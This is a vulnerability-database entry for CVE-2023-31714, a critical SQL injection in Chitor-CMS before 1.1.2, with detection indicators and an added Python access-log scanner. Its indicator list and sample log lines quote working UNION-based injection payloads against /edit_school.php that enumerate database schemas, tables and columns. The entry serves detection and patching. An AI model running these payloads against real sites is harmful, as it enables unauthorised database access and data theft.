cbcvebase.
CVE-2023-31714
published 2023-08-30

CVE-2023-31714: Chitor-CMS before v1.1.2 was discovered to contain multiple SQL injection vulnerabilities.

Priority: P261
critical 9.8 (CVSS 3.1)
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
EXPLOIT
EPSS: 3.28% (86.9th percentile)

Affected

1 range

| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| waqaskanju | chitor-cms | < 1.1.2 | 1.1.2 |

Detection & IOCs (extracted from sources)

path: /edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.SCHEMATA-- -
path: /edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ctable_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x
path: /edit_school.php?id=-2164' UNION ALL SELECT NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Ccolumn_name))%2C0x716a6b6271) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=
bytes: 0x71707a6b71 / 0x716a6b6271
  • Monitor HTTP GET requests to /edit_school.php with an `id` parameter value beginning with a negative integer followed by a single quote and UNION ALL SELECT, indicating pre-authentication SQL injection exploitation.
  • Detect the hex-encoded canary strings 0x71707a6b71 ('qpzkq') and 0x716a6b6271 ('qjkbq') in HTTP request or response bodies; these are the attacker's unique delimiters used to extract SQL query results.
  • The exploit is pre-authentication (no login required); alert on UNION-based SQL injection payloads targeting INFORMATION_SCHEMA.SCHEMATA, INFORMATION_SCHEMA.TABLES, and INFORMATION_SCHEMA.COLUMNS via the edit_school.php endpoint.
  • Look for the separator hex string 0x787a6d64706c ('xzmdpl') in URL-encoded query parameters; it is used by the exploit to delimit column values within concatenated SQL output.
  • The vulnerability affects Chitor-CMS versions before 1.1.2; the fix was committed on 2023/04/16 at commit 69d3442. Ensure the patched version is deployed.
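
The detection points above can be applied to web server access logs as follows. This is an added example, not code from the source page or from the Chitor-CMS project; the rule names, the combined log format and the sample log lines are assumptions constructed for illustration, while the marker values and the endpoint are the ones listed above.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Marker values quoted on this page (hex literals from the request URLs).
DELIMITERS = ("71707a6b71", "716a6b6271")
SEPARATOR = ("787a6d64706c",)
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')
UNION_RE = re.compile(r"^-\d+'\s*UNION\s+ALL\s+SELECT\b", re.I)
SCHEMA_RE = re.compile(r"INFORMATION_SCHEMA\.(?:SCHEMATA|TABLES|COLUMNS)\b", re.I)

def has_marker(text, hex_values):
    """True if a marker appears as a 0x literal or as its decoded ASCII text."""
    lowered = text.lower()
    return any("0x" + h in lowered or bytes.fromhex(h).decode("ascii") in lowered
               for h in hex_values)

def scan_line(line):
    """Return the sorted names of the rules one access-log line triggers."""
    match = REQUEST_RE.search(line)
    if not match:
        return []
    target = match.group(1)
    parts = urlsplit(target)
    decoded = unquote_plus(target)  # undo %27, %2C, %20 and '+' before matching
    hits = set()
    if parts.path.lower().endswith("/edit_school.php"):
        ids = parse_qs(parts.query, keep_blank_values=True).get("id", [])
        if any(UNION_RE.search(value) for value in ids):
            hits.add("edit_school_union")
        if SCHEMA_RE.search(decoded):
            hits.add("information_schema")
    if has_marker(decoded, DELIMITERS):
        hits.add("delimiter_marker")
    if has_marker(decoded, SEPARATOR):
        hits.add("separator_marker")
    return sorted(hits)

# Constructed sample lines (combined log format, documentation IP ranges).
SAMPLE_LOG = """\
192.0.2.10 - - [30/Aug/2023:10:00:00 +0000] "GET /edit_school.php?id=12 HTTP/1.1" 200 512
198.51.100.7 - - [30/Aug/2023:10:00:05 +0000] "GET /edit_school.php?id=-2164'%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CCONCAT(0x71707a6b71%2CJSON_ARRAYAGG(CONCAT_WS(0x787a6d64706c%2Cschema_name))%2C0x716a6b6271)%20FROM%20INFORMATION_SCHEMA.SCHEMATA--%20- HTTP/1.1" 200 2048
198.51.100.7 - - [30/Aug/2023:10:00:09 +0000] "GET /cms/edit_school.php?id=-2164%27+union+all+select+null%2Cnull%2Cschema_name+from+information_schema.schemata--+- HTTP/1.1" 200 1900
192.0.2.10 - - [30/Aug/2023:10:00:12 +0000] "GET /index.php HTTP/1.1" 200 4096
""".splitlines()

if __name__ == "__main__":
    for entry in SAMPLE_LOG:
        print(scan_line(entry), entry.split('"')[1][:60])
```

The rules inspect request lines only; matching the decoded markers ('qpzkq', 'qjkbq') in response bodies requires response capture at a proxy or WAF.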